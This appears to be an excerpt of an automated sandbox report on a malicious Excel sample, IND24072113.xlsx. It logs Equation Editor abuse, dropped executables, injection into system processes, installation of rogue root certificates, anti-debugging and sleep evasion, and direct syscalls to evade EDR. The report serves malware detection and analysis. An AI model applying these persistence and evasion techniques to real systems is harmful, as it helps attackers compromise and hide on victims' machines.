Source: C:\Windows\SysWOW64\msinfo32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Windows\SysWOW64\RichEd32.dllJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: IND24072113.xlsxStatic file information: File size 1431575 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: msinfo32.pdb source: svchost.exe, 00000006.00000003.490616533.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, uAjPOONiWk.exe, 00000007.00000003.484856022.00000000006B5000.00000004.00000001.00020000.00000000.sdmp, uAjPOONiWk.exe, 00000007.00000002.639642478.00000000006DB000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: msinfo32.pdb@ source: svchost.exe, 00000006.00000003.490616533.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, uAjPOONiWk.exe, 00000007.00000003.484856022.00000000006B5000.00000004.00000001.00020000.00000000.sdmp, uAjPOONiWk.exe, 00000007.00000002.639642478.00000000006DB000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uAjPOONiWk.exe, 00000007.00000000.481547931.00000000008DE000.00000002.00000001.01000000.00000005.sdmp, uAjPOONiWk.exe, 00000009.00000002.639603944.00000000008DE000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdb source: word.exe, 00000005.00000003.429340915.0000000003FE0000.00000004.00001000.00020000.00000000.sdmp, word.exe, 00000005.00000003.428942724.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000006.00000002.497270850.0000000000870000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.479680462.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.497270850.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.479390301.0000000000450000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000008.00000003.498304702.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000008.00000003.498006894.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000008.00000002.639750700.0000000002270000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 00000008.00000002.639750700.00000000020F0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: msinfo32.exe, 00000008.00000002.639902126.000000000299C000.00000004.10000000.00040000.00000000.sdmp, msinfo32.exe, 00000008.00000002.639530114.00000000002D6000.00000004.00000020.00020000.00000000.sdmp, uAjPOONiWk.exe, 00000009.00000000.510508746.0000000002BDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.552686971.000000000139C000.00000004.80000000.00040000.00000000.sdmp
Source: IND24072113.xlsxInitial sample: OLE indicators vbamacros = False
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0040EB70 LoadLibraryA,GetProcAddress,5_2_0040EB70
Source: kontempt2.1[1].exe.2.drStatic PE information: real checksum: 0xa2135 should be: 0x14f715
Source: word.exe.2.drStatic PE information: real checksum: 0xa2135 should be: 0x14f715
Source: sqlite3.dll.8.drStatic PE information: section name: /4
Source: sqlite3.dll.8.drStatic PE information: section name: /19
Source: sqlite3.dll.8.drStatic PE information: section name: /31
Source: sqlite3.dll.8.drStatic PE information: section name: /45
Source: sqlite3.dll.8.drStatic PE information: section name: /57
Source: sqlite3.dll.8.drStatic PE information: section name: /70
Source: sqlite3.dll.8.drStatic PE information: section name: /81
Source: sqlite3.dll.8.drStatic PE information: section name: /92
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00490D70 push edx; retf 5_2_00490E83
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004171D1 push ecx; ret 5_2_004171E4
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0040D079 push eax; retf 6_2_0040D086
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004140CE push ds; ret 6_2_004140CF
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0041EA53 push ebx; retf 6_2_0041EAAA
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00408263 push ebp; iretd 6_2_004082AE
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004122CA push 845B296Ch; iretd 6_2_004122D2
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0040AA85 push ds; ret 6_2_0040AB14
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004082AF push ebp; iretd 6_2_004082AE
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0040AAB4 push ds; ret 6_2_0040AB14
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00403300 push eax; ret 6_2_00403302
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00411B09 push eax; ret 6_2_00411B0A
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00408384 push ebx; iretd 6_2_00408387
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0041ABAC push edx; retf 6_2_0041ABAD
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0041F463 push edi; retf 6_2_0041F46E
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00418CDB push cs; ret 6_2_00418CE1
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00417CEF push FFFFFFBBh; retf 6_2_00417CF2
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004165CF push esi; iretd 6_2_0041665E
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00416612 push esi; iretd 6_2_0041665E
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004236DA push ebx; iretd 6_2_004236DB
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0088DFA1 push ecx; ret 6_2_0088DFB4

Persistence and Installation Behavior

barindex
Installs new ROOT certificates
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeFile created: C:\Users\user\AppData\Local\Temp\sqlite3.dllJump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\word.exeJump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\kontempt2.1[1].exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,5_2_004772DE
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_004375B0
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004440785_2_00444078
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\AppData\Roaming\word.exeAPI/Special instruction interceptor: Address: 3A463BC
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_008D0101 rdtsc 6_2_008D0101
Source: C:\Windows\SysWOW64\msinfo32.exeWindow / User API: threadDelayed 1043Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeWindow / User API: threadDelayed 8920Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sqlite3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\word.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_5-82647
Source: C:\Users\user\AppData\Roaming\word.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_5-81173
Source: C:\Users\user\AppData\Roaming\word.exeAPI coverage: 3.2 %
Source: C:\Windows\SysWOW64\msinfo32.exeAPI coverage: 1.8 %
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3468Thread sleep time: -240000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe TID: 3688Thread sleep count: 1043 > 30Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe TID: 3688Thread sleep time: -2086000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe TID: 3760Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe TID: 3688Thread sleep count: 8920 > 30Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe TID: 3688Thread sleep time: -17840000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\msinfo32.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\msinfo32.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,5_2_00452126
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,5_2_0045C999
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,5_2_00436ADE
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00434BEE
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,5_2_00436D2D
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00442E1F
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0045DD7C FindFirstFileW,FindClose,5_2_0045DD7C
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,5_2_0044BD29
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_00475FE5
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_0044BF8D
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,5_2_0040E470
Source: C:\Users\user\AppData\Roaming\word.exeAPI call chain: ExitProcess graph end nodegraph_5-81130
Source: C:\Users\user\AppData\Roaming\word.exeAPI call chain: ExitProcess graph end nodegraph_5-81051
Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_008D0101 rdtsc 6_2_008D0101
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_008807AC NtCreateMutant,LdrInitializeThunk,6_2_008807AC
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0045A259 BlockInput,5_2_0045A259
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,5_2_0040D6D0
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0040EB70 LoadLibraryA,GetProcAddress,5_2_0040EB70
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0360190D mov edx, dword ptr fs:[00000030h]2_2_0360190D
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_03A46688 mov eax, dword ptr fs:[00000030h]5_2_03A46688
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_03A46628 mov eax, dword ptr fs:[00000030h]5_2_03A46628
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_03A44FE8 mov eax, dword ptr fs:[00000030h]5_2_03A44FE8
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00870080 mov ecx, dword ptr fs:[00000030h]6_2_00870080
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_008700EA mov eax, dword ptr fs:[00000030h]6_2_008700EA
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_008926F8 mov eax, dword ptr fs:[00000030h]6_2_008926F8
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00426DA1 CreateFileW,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,5_2_00426DA1
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0042202E SetUnhandledExceptionFilter,5_2_0042202E
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_004230F5
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00417D93
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00421FA7

HIPS / PFW / Operating System Protection Evasion

barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeNtQueryInformationProcess: Direct from: 0x774CFAFAJump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeNtCreateUserProcess: Direct from: 0x774D093EJump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeNtCreateKey: Direct from: 0x774CFB62Jump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeNtQuerySystemInformation: Direct from: 0x774D20DEJump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeNtQueryDirectoryFile: Direct from: 0x774CFDBAJump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeNtClose: Direct from: 0x774CFA02
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeNtWriteVirtualMemory: Direct from: 0x774D213EJump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeNtCreateFile: Direct from: 0x774D00D6Jump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeNtSetTimer: Direct from: 0x774D021AJump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeNtOpenFile: Direct from: 0x774CFD86Jump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeNtOpenKeyEx: Direct from: 0x774CFA4AJump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeNtAllocateVirtualMemory: Direct from: 0x774CFAE2Jump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeNtResumeThread: Direct from: 0x774D008DJump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeNtOpenKeyEx: Direct from: 0x774D103AJump to behavior
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeNtUnmapViewOfSection: Direct from: 0x774CFCA2Jump to behavior
